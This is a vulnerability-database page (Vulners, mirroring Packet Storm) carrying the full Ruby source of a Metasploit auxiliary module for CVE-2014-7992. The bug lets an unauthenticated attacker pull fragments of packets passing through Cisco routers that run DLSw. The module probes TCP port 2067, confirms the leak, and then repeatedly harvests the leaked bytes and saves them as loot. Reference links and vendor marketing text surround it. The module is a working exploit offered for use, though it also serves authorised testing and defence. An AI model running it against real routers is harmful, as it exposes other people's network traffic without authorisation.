Vulners
Lucene search
Cisco DLSw Information Disclosure Scanner
🗓️ 31 Aug 2024 00:00:00Reported by John McLeod, Tate Hansen, Kyle Rainey, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 210 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2014-7992 | 29 May 201815:50 | – | circl |
 | Cisco IOS Software DLSw Information Disclosure Vulnerability | 18 Nov 201419:13 | – | cisco |
 | CVE-2014-7992 | 18 Nov 201401:00 | – | cve |
 | CVE-2014-7992 | 18 Nov 201401:00 | – | cvelist |
 | Cisco DLSw Information Disclosure Scanner | 18 Nov 201403:35 | – | metasploit |
 | CVE-2014-7992 | 18 Nov 201401:59 | – | nvd |
 | Design/Logic Flaw | 18 Nov 201401:59 | – | prion |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'socket'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Cisco DLSw Information Disclosure Scanner',
'Description' => %q(
This module implements the DLSw information disclosure retrieval. There
is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains
that allows an unauthenticated remote attacker to retrieve the partial
contents of packets traversing a Cisco router with DLSw configured
and active.
),
'Author' => [
'Tate Hansen', # Vulnerability discovery
'John McLeod', # Vulnerability discovery
'Kyle Rainey' # Built lab to recreate vulnerability and help test
],
'References' =>
[
['CVE', '2014-7992'],
['URL', 'https://github.com/tt5555/dlsw_exploit']
],
'DisclosureDate' => 'Nov 17 2014',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(2067),
OptInt.new('LEAK_AMOUNT', [true, 'The number of bytes to store before shutting down.', 1024])
])
end
def get_response(size = 72)
connect
response = sock.get_once(size)
disconnect
response
end
# Called when using check
def check_host(_ip)
print_status("Checking for DLSw information disclosure (CVE-2014-7992)")
response = get_response
if response.blank?
vprint_status("No response")
Exploit::CheckCode::Safe
elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48"
vprint_good("Detected DLSw protocol")
report_service(
host: rhost,
port: rport,
proto: 'tcp',
name: 'dlsw'
)
# TODO: check that response has something that truly indicates it is vulnerable
# and not simply that it responded
unless response[18..72].scan(/\x00/).length == 54
print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes")
report_vuln(
host: rhost,
port: rport,
name: name,
refs: references,
info: "Module #{fullname} collected #{response.length} bytes"
)
Exploit::CheckCode::Vulnerable
end
else
vprint_status("#{response.size}-byte response didn't contain any leaked data")
Exploit::CheckCode::Safe
end
end
# Main method
def run_host(ip)
return unless check_host(ip) == Exploit::CheckCode::Vulnerable
dlsw_data = ''
until dlsw_data.length > datastore['LEAK_AMOUNT']
response = get_response
dlsw_data << response[18..72] unless response.blank?
end
loot_and_report(dlsw_data)
end
def loot_and_report(dlsw_leak)
path = store_loot(
'dlsw.packet.contents',
'application/octet-stream',
rhost,
dlsw_leak,
'DLSw_leaked_data',
'DLSw packet memory leak'
)
print_status("DLSw leaked data stored in #{path}")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
EPSS0.60801